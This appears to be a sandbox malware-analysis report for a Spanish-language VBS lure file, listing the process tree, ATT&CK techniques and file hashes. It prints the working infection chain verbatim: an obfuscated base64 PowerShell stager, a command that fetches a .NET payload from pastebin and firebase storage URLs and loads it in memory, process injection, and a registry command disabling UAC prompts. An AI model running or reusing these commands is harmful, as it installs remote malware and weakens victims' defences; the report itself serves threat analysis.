☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1212 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5568
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
PID:5912 -
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"", 0, true:close")2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2704 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5232
-
-
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(ChrW(87) + ChrW(83) + ChrW(99) + ChrW(114) + ChrW(105) + ChrW(112) + ChrW(116) + ChrW(46) + ChrW(83) + ChrW(104) + ChrW(101) + ChrW(108) + ChrW(108)).Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Stop-Process -Name 'cmstp'3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"1⤵
- Checks computer location settings
PID:4964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6096 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1444
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"1⤵
- Checks computer location settings
PID:1880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5208 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:1172
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5532
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"1⤵
- Checks computer location settings
PID:5924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4808 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4872
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD5e1a4327af3cd8ca866996f472f0ff93a
SHA1cfea8426ef8fab4136055401152821a19f908d45
SHA2565f0bc7d75f32981e0e704c2217ed423c9a355f19515a1603103cc55cf9d3b901
SHA512745f1ec495869d2fa2722ecadcaa27ec1f005742c69110802e9e1d7600d680d077e9762a400799e38003a4671a2590ecf1c480c2e7586039ebcce6ed36662280
-
Filesize
2.3MB
MD59303575597168ef11790500b29279f56
SHA1bfab0ea30c5959fda893b9ddc6a348a4f47f8677
SHA2560a507a553010c19369f17b649c5ffe6060216480059062ff75241944cf729bd7
SHA5128e9f7a98c0a0c90643403d4abccd8736d12ba6bef83679ccfd626e52e86ed7db6fe558c6ec48a88cf32967c00d66131f550ac64cc98cd73fd477f165694e68b0
-
Filesize
65KB
MD547aa03a10ac3a407f8f30f1088edcbc9
SHA1b5d78a1d3ae93bd343c6d65e64c0945d1d558758
SHA256c79a2bb050af6436b10b58ef04dbc7082df1513cec5934432004eb56fba05e66
SHA5123402ca68b00ffd9e2551f97b3895990ee0274f14f117505c3588ea76c716488860ac2da07c1d9275bbc43eb87b88893c52fb04d15f1afe7b7bf7d9a524961101
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
